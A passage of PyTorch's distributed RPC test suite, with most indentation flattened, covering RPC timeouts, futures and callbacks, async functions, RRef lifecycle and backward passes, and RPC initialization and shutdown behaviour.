# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
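        # Checks that the dist_init decorator works both when called with arguments and
        # when used bare.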
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
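        # Checks that _use_rpc_pickler swaps the default RPC pickler within the context
        # and restores _internal_rpc_pickler afterwards.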
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# Test that if a function does not exist on a callee, we don't crash;
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this node
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
RuntimeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# Create a reference cycle so that Python does not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
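# Helper used by the confirmation tests below: creates a UserRRef whose owner is the
# worker two ranks away.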
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
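# The tests below exercise Future.then() and add_done_callback() semantics on RPC futures.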
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes,
# so add a 'then' callback that runs afterwards and wait on it to guarantee the first callback has run.
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
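# Shared driver for the Future helpers: `func` runs on dst1 and is expected to chain an
# RPC to dst2 through a Future callback, returning torch.ones(2, 2) + 1 + 2.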
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
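# Dispatch helper: invoke `fn` on `to` via rpc_sync, rpc_async().wait(), or
# remote().to_here() depending on `mode`.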
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
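# Exercise the async-execution methods of AsyncExecutionClass through RRef proxies
# (rpc_sync() / rpc_async() / remote()); the static, class, and bound calls together
# are expected to sum to 3 * 4 * x, as asserted below.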
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
@dist_init(setup_rpc=False)
def test_shutdown_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
if self.rank != 0:
og_func = rpc.api._broadcast_to_followers
og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
# Monkey-patch _broadcast_to_followers to fail, which would ensure
# _all_gather on leader raises an exception.
def raise_error(sequence_id, objects_map):
og_func(sequence_id, objects_map)
raise RuntimeError('simulation')
# Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
# which would ensure barrier is not called on followers.
def rref_error():
raise RuntimeError('simulation rref')
try:
rpc.api._broadcast_to_followers = raise_error
rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
rpc.shutdown()
finally:
rpc.api._broadcast_to_followers = og_func
rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
else:
with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
rpc.shutdown()
dist.barrier()
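# Parameter-server helpers: each trainer runs MyEmbeddingBagModel locally, sends its
# gradient to the MyParameterServer RRef for averaging, and checks that the averaged
# gradient it gets back matches the one stored on the server.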
def _trainer_func(self, rref, sparse):
m = MyEmbeddingBagModel(sparse=sparse)
loss_fn = nn.MSELoss()
for i in range(10):
outputs = m(torch.rand(10, 10).long())
loss_fn(outputs, torch.rand(10, 10)).backward()
gradient = list(m.parameters())[0].grad
fut = rref.rpc_async().average(rref, i, gradient)
gradient = fut.wait()
if gradient.is_sparse:
gradient = gradient.to_dense().double()
ps_gradient = rref.rpc_sync().get_gradient(rref)
if ps_gradient.is_sparse:
ps_gradient = ps_gradient.to_dense().double()
self.assertTrue(torch.equal(gradient, ps_gradient))
